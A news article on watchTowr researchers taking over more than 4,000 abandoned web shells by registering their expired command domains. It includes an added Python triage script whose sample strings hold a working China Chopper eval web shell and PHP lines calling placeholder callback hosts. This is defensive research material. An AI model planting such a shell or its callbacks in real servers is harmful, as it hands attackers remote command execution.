Category: IT|Jan 8, 2025 | Author: Admin

Over 4,000 backdoors hijacked by registering expired domains


Over 4,000 abandoned but still active web backdoors were hijacked and their communication infrastructure sinkholed after researchers registered expired domains used for commanding them.


Some of the live malware (web shells) was deployed on web servers of high-profile targets, including government and university systems, ready to execute commands from anyone who took control of the communication domains. 

Together with The Shadowserver Foundation, researchers at offensive security outfit WatchTowr Labs prevented these domains and the corresponding victims from falling into the hands of malicious actors.

Finding thousands of breached systems
Backdoors are malicious tools or code planted on a compromised system to give an attacker unauthorized remote access and control. Threat actors typically use them to keep persistent access and to run commands on the compromised system that further the attack.

WatchTowr researchers hunted for the command-and-control domains hard-coded in various web shells and registered any that had expired, essentially taking control of the backdoors.

After the researchers set up a logging system on the newly registered domains, the abandoned but still active malware began sending requests to it, which allowed them to identify at least some of the victims.

By registering more than 40 domains, the researchers received connections from over 4,000 compromised systems attempting to "phone home."


The researchers found several backdoor types, including the "classic" r57shell, the more advanced c99shell, which offers file management and brute-forcing capabilities, and the 'China Chopper' web shell that is often linked to APT groups.
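The workflow described above (mine the shells for their callback domains, see which names have lapsed, and register them before anyone else does), together with a rough identification of the shell families the article names, as an added Python example that is not WatchTowr's tooling and not part of the original article. The web shell snippets and their domains are constructed for the example and use IANA-reserved TLDs, the family signatures are deliberately simplistic, and the DNS lookup is only a first filter:

```python
"""
Triage the callback domains hard-coded in web shell samples.

Added example, not WatchTowr's tooling: pull every domain out of the shell
source, guess the shell family from simple string signatures, and flag the
domains that no longer resolve as candidates to check against a registrar.
"""
import re
import socket
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed samples. The domains use IANA-reserved TLDs (.example,
# .invalid, .test) and are not real backdoor infrastructure.
SAMPLES: Dict[str, str] = {
    "uploads/r57.php": (
        "<?php\n"
        "$shell_name = 'r57shell';\n"
        "$update_url = 'http://r57-updates.example/r57.txt';\n"
        "$stats_url  = 'http://r57-updates.example/log.php?h=' . $_SERVER['HTTP_HOST'];\n"
        "echo @file_get_contents('http://backdoor-counter.invalid/hit');\n"
    ),
    "images/c99.php": (
        "<?php\n"
        "$shver = 'c99shell v.1.0';\n"
        "$surl  = 'http://c99-home.example/update/';\n"
        "$ftp_brute = 'http://live-infra.test/ftpbrute.php';\n"
    ),
    # China Chopper style one-liner: the operator sends the code with each
    # request, so there is no hard-coded callback domain to hijack.
    "cache/chopper.php": "<?php @eval($_POST['pass']); ?>\n",
}

# Simplistic family signatures, enough for the three families named above.
FAMILY_SIGNATURES = [
    ("r57shell", re.compile(r"r57", re.I)),
    ("c99shell", re.compile(r"c99", re.I)),
    ("china_chopper", re.compile(r"@eval\(\$_(?:POST|REQUEST|GET)\[", re.I)),
]

# Hostname part of any http(s) URL; the port or path ends the match.
URL_HOST = re.compile(r"https?://([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


@dataclass
class ShellReport:
    path: str
    family: str
    domains: Dict[str, bool]  # callback domain -> does it still resolve?


def classify_shell(source: str) -> str:
    """First matching family signature, or 'unknown'."""
    for family, pattern in FAMILY_SIGNATURES:
        if pattern.search(source):
            return family
    return "unknown"


def extract_domains(source: str) -> List[str]:
    """Unique hostnames from URLs in the source, first-seen order; raw IPs skipped."""
    seen: List[str] = []
    for host in URL_HOST.findall(source):
        host = host.lower()
        if re.fullmatch(r"[\d.]+", host) or host in seen:
            continue
        seen.append(host)
    return seen


def dns_resolves(domain: str) -> bool:
    """True if the name currently resolves. A failed lookup is only a hint:
    confirm registration status via WHOIS/RDAP before treating the name as free."""
    try:
        socket.gethostbyname(domain)
        return True
    except OSError:  # socket.gaierror is a subclass
        return False


def triage(samples: Dict[str, str],
           resolves: Callable[[str], bool] = dns_resolves) -> List[ShellReport]:
    """Classify each sample and look up every callback domain it contains."""
    reports = []
    for path, source in samples.items():
        domains = {d: resolves(d) for d in extract_domains(source)}
        reports.append(ShellReport(path, classify_shell(source), domains))
    return reports


def candidates_for_registration(reports: List[ShellReport]) -> List[str]:
    """Domains that no longer resolve, i.e. the ones worth checking at a registrar."""
    dead = {d for r in reports for d, alive in r.domains.items() if not alive}
    return sorted(dead)


if __name__ == "__main__":
    # Stand-alone run uses real DNS; the reserved TLDs above will not resolve.
    for report in triage(SAMPLES):
        print(f"{report.path}: {report.family} {report.domains}")
    print("check at registrar:", candidates_for_registration(triage(SAMPLES)))
```

The resolver is injectable so the triage logic can be exercised without network access. What the script flags is a lead, not a result: a name that fails to resolve may still be registered, so the registrar check comes next, and, as the article shows, a domain you do register needs a sinkhole with logging behind it and a long-term custodian such as Shadowserver so it does not lapse a second time.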

The report even mentions one backdoor that showed behavior associated with the Lazarus Group, although it later clarifies that this was likely reuse of the threat actor's tool by others.

Among the varied set of breached machines, WatchTowr found multiple systems within China's government infrastructure, including courts, a compromised Nigerian government judicial system, and systems in Bangladesh's government network.

In addition, infected systems were found in educational institutions in Thailand, China, and South Korea.

WatchTowr handed over management of the hijacked domains to The Shadowserver Foundation to ensure that they will not become available for takeover in the future. Shadowserver is now sinkholing all traffic sent from the breached systems to those domains.

WatchTowr's research, although not technically complex, shows that expired domains from old malware operations can still serve new cybercriminals, who can inherit victims simply by registering the control domains.
